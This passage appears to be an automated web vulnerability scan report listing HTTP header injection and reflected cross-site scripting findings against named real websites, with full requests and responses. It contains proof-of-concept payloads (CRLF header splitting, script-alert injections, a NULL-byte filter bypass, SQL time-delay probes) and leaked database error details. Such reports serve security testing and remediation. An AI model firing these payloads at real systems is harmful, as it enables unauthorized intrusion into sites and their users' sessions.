Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response 2

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:13:26 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43390


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
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
...[SNIP]...
4. HTTP header injection  previous  next
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

4.1. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc.other

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 46fd5%0d%0a3cd3e079b91 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /46fd5%0d%0a3cd3e079b91/scmag.hmktus/sc.other;log=0;spr=0;sid=122;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=28877081349492070? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/46fd5
3cd3e079b91/scmag.hmktus/sc.other;log=0;spr=0;sid=122;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=28877081349492070:
Date: Fri, 06 May 2011 21:52:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
4.2. http://d.xp1.ru4.com/activity [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload 65753%0d%0abe7cf5083b was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_bk&redirect=65753%0d%0abe7cf5083b HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AM-00000000030620452; O1807966=16; P1807966=c3N2X2MyfFl8MTMwNDM2MDM2MHxzc3ZfYnxjMnwxMzA0MzYwMzYwfHNzdl8xfDI4NTQ0NTQ3M3wxMzA0MzYwMzYwfA==

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 06 May 2011 22:33:42 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://65753
be7cf5083b
Content-length: 0
Connection: close

4.3. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the replace0_ul_ request parameter is copied into the Location response header. The payload c78b2%0d%0ac733422f1d was submitted in the replace0_ul_ parameter. This caused a response containing an injected HTTP header.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=c78b2%0d%0ac733422f1d&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 06 May 2011 23:00:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=7FF0975F91689439896F745E92A5D2C0; Path=/
Location: http://learn.bridgefront.com/forgetpassword.jsp?status=error&result=0&sendpasswordof=null&login=c78b2
c733422f1d&email=3
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

5. Cross-site scripting (reflected)  previous  next
There are 111 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

5.1. http://adsfac.us/ag.asp [cc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.us
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the HTML document as plain text between tags. The payload 40985<script>alert(1)</script>52a30286c50 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=40985<script>alert(1)</script>52a30286c50&source=js&ord=5429500 HTTP/1.1
Host: adsfac.us
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSDLK001=pctl=311878&fpt=0%2C311878%2C&pct%5Fdate=4131&FL311878=1&pctm=1&FM34631=1&pctc=34631&FQ=1; FSESE002=pctl=311033&fpt=0%2C311033%2C&pct%5Fdate=4133&FL311033=1&pctm=1&FM34983=1&pctc=34983&FQ=1; FSQTS032=pctl=304931&fpt=0%2C304931%2C&pct%5Fdate=4139&pctm=1&FL304931=1&FM36289=1&pctc=36289&FQ=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 293
Content-Type: text/html
Expires: Sat, 07 May 2011 01:49:21 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: FS40985%3Cscript%3Ealert%281%29%3C%2Fscript%3E52a30286c500=uid=101126131; expires=Sun, 08-May-2011 01:50:20 GMT; path=/
Set-Cookie: FS40985%3Cscript%3Ealert%281%29%3C%2Fscript%3E52a30286c50=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4143&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Tue, 07-Jun-2011 01:50:20 GMT; path=/
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Sat, 07 May 2011 01:50:20 GMT
Connection: close

if (typeof(fd_clk) == 'undefined') {var fd_clk = 'http://ADSFAC.US/link.asp?cc=40985<script>alert(1)</script>52a30286c50.0.0&CreativeID=1';}document.write('<a href="'+fd_clk+'&CreativeID=1" target="_blank">
...[SNIP]...
5.2. http://apps.sapha.com/appshandler.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload %0096ee3<script>alert(1)</script>d1ed8df0664 was submitted in the ac parameter. This input was echoed as 96ee3<script>alert(1)</script>d1ed8df0664 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /appshandler.php?ac=1%0096ee3<script>alert(1)</script>d1ed8df0664&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 600

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT SQL_CACHE t1.site_application_id FROM site_application t1, application t3 WHERE t1.application_id = t3.application_id AND t1.site_ID = 1.96ee3<script>alert(1)</script>d1ed8df0664 AND t1.site_application_isactive = 1 ORDER BY t3.application_order, t1.site_application_id<br>
...[SNIP]...
5.3. http://apps.sapha.com/appshandler.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload f84ef<script>alert(1)</script>6416a2fdb7e was submitted in the ac parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /appshandler.php?ac=2546f84ef<script>alert(1)</script>6416a2fdb7e&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: apps.sapha.com
Cookie: sapha_tst_2546=TRUE

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:54:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 682

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT SQL_CACHE t1.site_application_id FROM site_application t1, application t3 WHERE t1.application_id = t3.application_id AND t1.site_ID = 2546f84ef<script>alert(1)</script>6416a2fdb7e AND t1.site_application_isactive = 1 ORDER BY t3.application_order, t1.site_application_id<br>
...[SNIP]...
5.4. https://broker.gotoassist.com/h/lbmc [CompanyName parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://broker.gotoassist.com
Path:   /h/lbmc

Issue detail

The value of the CompanyName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21525"><a>48f3eb756f8 was submitted in the CompanyName parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /h/lbmc?Portal=lbmc&Target=ds%2FqueryPost.flow&Template=ds%2FphoneModeRedemption.tmpl&JavaScript=true&Form=lbmcSmartPage&Name_Full=&CompanyName=21525"><a>48f3eb756f8&Question= HTTP/1.1
Host: broker.gotoassist.com
Connection: keep-alive
Referer: http://www.gotoassist.com/ph/lbmc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:44:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: dtsSession=SessionInfo%3D237919369%253A7FA06EBD517AE37; path=/
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 9094

       <html>


<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>GoToAssist: live online customer support</title>

<script language="JavaScript">
<!--
function empty
...[SNIP]...
<input type=text size=18 style="font: normal 10 verdana,arial,helvetica;width:156;height:17;" name="CompanyName" value="21525"><a>48f3eb756f8">
...[SNIP]...
5.5. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-cms.scout.com
Path:   /feeds/analyticsfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 301e2<script>alert(1)</script>4043fa130e3 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/analyticsfeed.ashx?page=http%3A//www.scout.com/2/a.z%3Fcfg%3D%2527%3BWAITFOR%2520DELAY%2520%25270%3A0%3A25%2527--%26fromprefetch%3D1%26p%3D26%26s%3D143&format=json&callback=$.analytics.report301e2<script>alert(1)</script>4043fa130e3 HTTP/1.1
Host: cdn-cms.scout.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1&p=26&s=143
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=202704078.454375544.1303509265.1303516031.1303522301.3; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Fri, 06 May 2011 19:29:14 GMT
Connection: close
Akamai: True
Content-Length: 347

$.analytics.report301e2<script>alert(1)</script>4043fa130e3({"network":"Scout","site":"www","sports":[],"categories":[],"pagetype":"ErrorMaintenance","pagesubtype":"","author":"","dateoverride":{"rfc822":"","year":"","month":"","day":"","hour":"","minute":"","
...[SNIP]...
5.6. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-forums.scout.com
Path:   /adfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 10cef<script>alert(1)</script>d3df570dff5 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adfeed.ashx?s=143&format=json&callback=$.showAd.cacheAdCodes10cef<script>alert(1)</script>d3df570dff5 HTTP/1.1
Host: cdn-forums.scout.com
Proxy-Connection: keep-alive
Referer: http://www.scout.com/2/a.z?cfg=%27;WAITFOR%20DELAY%20%270:0:25%27--&fromprefetch=1&p=26&s=143
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; __utma=202704078.454375544.1303509265.1303516031.1303522301.3; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Server: Mbrd8
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Website-Assembly-Version: 2.21.0.0
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Fri, 06 May 2011 19:29:15 GMT
Connection: close
Akamai: True
Content-Length: 335

$.showAd.cacheAdCodes10cef<script>alert(1)</script>d3df570dff5({"ads":[{"code":"SPTSN1","height":90,"type":"DISPLAY","width":728},{"code":"SPTSN3","height":600,"type":"DISPLAY","width":160},{"code":"SPTSHP","height":250,"type":"DISPLAY","width":300},{"code":"SPTS
...[SNIP]...
5.7. http://dce.sapha.com/engine.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload 8870a<script>alert(1)</script>5c8aaf5ef92 was submitted in the ac parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /engine.php?ac=-111'%20OR%20SLEEP(25)=0%20LIMIT%201--8870a<script>alert(1)</script>5c8aaf5ef92 HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 494

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '-111' OR SLEEP(25)=0 LIMIT 1--8870a<script>alert(1)</script>5c8aaf5ef92'<br>
...[SNIP]...
5.8. http://dce.sapha.com/engine.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload acfaf<script>alert(1)</script>dffcf9b8718 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /engine.php?ac=-111'%20OR%20SLEEP(25)=0%20LIMIT%2/acfaf<script>alert(1)</script>dffcf9b871801-- HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
